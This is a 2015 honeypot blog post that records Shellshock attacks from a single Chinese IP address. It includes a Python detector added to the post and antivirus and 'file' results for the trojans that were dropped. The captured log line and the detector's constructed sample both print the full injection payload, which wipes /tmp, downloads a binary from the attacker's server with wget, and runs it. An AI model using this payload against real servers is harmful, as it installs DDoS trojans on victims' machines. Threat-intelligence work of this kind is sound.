Monday, 13 July 2015

Multiple ChinaZ-related attacks - 211.147.2.192

Yesterday, my honeypot was hit by several ChinaZ-related attacks.

{"message":"Jul 13 06:38:52 localhost [mypyfwa] 2015-07-13 06:38:52.540616 211.147.2.192 - - [12/Jul/2015:20:48:02 +0200] \"GET / HTTP/1.1\" 404 442 \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" 211.147.2.192 CN SHELLinjection","@version":"1","@timestamp":"2015-07-13T04:38:52.586Z","type":"syslog","file":"/var/log/smsids.log","host":"beeswarm","offset":"26328","tags":["_grokparsefailure"],"syslog_severity_code":5,"syslog_facility_code":1,"syslog_facility":"user-level","syslog_severity":"notice"}
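As an added example (not part of the original post), a small Python check that flags the Shellshock function-definition pattern in a JSON log record like the one above and pulls out the download URL and the path wget writes to. The sample record is constructed from the captured payload; the regexes and field names are my own assumptions, not the honeypot's.

```python
import json
import re

# Shellshock (CVE-2014-6271) trigger: a bash function definition followed by
# trailing commands, delivered in an HTTP field the CGI environment exposes.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")
CLIENT_IP_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}) - - \[")
URL_RE = re.compile(r"https?://[^\s\"'\\]+")
WGET_OUT_RE = re.compile(r"wget\s+\S+\s+-O\s+(\S+)")

# Constructed sample in the shape of the honeypot's syslog JSON;
# the payload text is the one captured in the log line above.
_PAYLOAD = (
    '() { :; }; /bin/bash -c "rm -rf /tmp/*;'
    'echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;'
    'echo echo By China.Z >> /tmp/Run.sh;'
    'echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;'
    'echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;'
    'echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"'
)
SAMPLE_LOG = json.dumps({
    "message": '211.147.2.192 - - [12/Jul/2015:20:48:02 +0200] "GET / HTTP/1.1" '
               f'404 442 "{_PAYLOAD}" "{_PAYLOAD}"',
    "type": "syslog",
})
BENIGN_LOG = json.dumps({  # constructed ordinary request, should not match
    "message": '10.0.0.5 - - [12/Jul/2015:20:50:00 +0200] "GET /index.html HTTP/1.1" '
               '200 1024 "-" "curl/7.38.0"',
    "type": "syslog",
})

def analyse(line):
    """Return indicators from one JSON log line, or None if no Shellshock probe."""
    msg = json.loads(line).get("message", "")
    if not SHELLSHOCK_RE.search(msg):
        return None
    ip = CLIENT_IP_RE.search(msg)
    return {
        "src": ip.group(1) if ip else None,
        "urls": sorted(set(URL_RE.findall(msg))),          # payload download sites
        "dropped": sorted(set(WGET_OUT_RE.findall(msg))),  # paths wget writes to
        "stager": "/tmp/Run.sh" in msg,                    # the echo >> Run.sh pattern
    }

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
    print(analyse(BENIGN_LOG))
```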

All attacks originated from the same source IP:
  •  211.147.2.192
"ip": "211.147.2.192",
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2012-03-22T07:26:00.000Z",
         "geo": {
            "country": "China",
            "countrycode": "CN"
         },
There were three different files within the attacks:
  • ./1122.32: Linux.Trojan.IptabLex FOUND
  • ./1122.64: Linux.Trojan.IptabLex FOUND
  • ./8uc: Unix.Trojan.DDoS_XOR-1 FOUND
pi@raspberrypi ~/ana $ file 1122.32
1122.32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 1122.64
1122.64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 8uc
8uc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped